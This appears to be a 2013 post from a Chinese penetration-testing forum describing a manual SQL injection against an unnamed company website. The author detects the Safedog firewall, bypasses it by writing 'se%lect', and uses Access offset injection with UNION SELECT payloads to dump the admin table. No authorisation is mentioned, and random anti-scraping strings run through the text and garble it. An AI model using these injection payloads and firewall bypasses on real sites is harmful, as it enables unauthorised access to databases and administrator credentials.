中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。: ?) [  z3 k9 G( i  X9 |

1 J3 F7 ~$ o/ q. }( P5 W/ z% R
! E, j+ E2 b# n1 w顺手加个admin# L% J8 M; R$ l7 a5 F4 |

) H! i6 O  P; _; e2 O# r3 h$ ^( H7 Z3 r: @- y6 F+ k9 s& ?
默认后台。
) M) v. n& u5 r回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
9 z0 b* x) I% S6 Y! A& ?7 {0 _& I/ s' i" s* L* _

, p) ^* ?: Z. s3 ?; D& I8 Z! G, R, ~
1 \& V$ }. \& |1 b4 t所以就不用御剑扫了,待会直接封IP。  X6 m6 S) g" p' d/ o
9 Z6 x. _" M3 [* |
用order by语句判断是否存在注入。% R6 ]. d" b' }, ^% y/ V
http://www.xxx.com /product_show.asp?id=997 order by 1
# c- M1 x% Q6 ?9 f1 Q/ @7 c; ohttp://www.xxx.com /product_show.asp?id=997 order by 100; H7 K% r/ `9 S# _
现在存在注入,经测试后发现是9个字段。& [# e5 \2 _- n8 ^% N. r

) h; \* S2 P, M接下来进行联合查询,猜是否存在admin表。6 B) f' W" Z& q: e- v$ |- `$ k/ ^
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​- {* k1 f# K* _+ A$ D* U

1 T5 y: z7 X' T: G% t" ]$ o& ?5 o5 O, I* k; G/ f5 h
& ~) S/ }1 x' E+ b6 z
在select中间加个%,se%lect绕过安全狗。
9 x; {) v0 `8 g6 s% u4 A) z5 |3 ?* P5 o, L" ~0 x
) l. T6 f, E3 P  L, X+ Y# ~
发现存在admin表,然后开始手工猜常用的字段。4 h  a: u4 G/ u% M% n; u
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。* T7 ~; G2 J# Z9 S0 i) Z" @
9 I/ a" M5 ?& _7 M( h: [# `
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
4 q7 w8 P8 F5 r: S$ c6 c4 k ; `0 ^( `2 d# ~" m/ R8 ?- U
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
% ]# B8 [3 x4 j% n6 ]6 Hhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
! V4 M- Y# I1 x: ?9 F& X好了,敏感内容出显了。​
3 ], c0 e; I8 E: [3 r7 E) q5 w0 _6 p
5 O8 ?2 O+ i% b/ C/ C9 Q

+ Z. ]* _0 n6 s8 K1 {* r




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2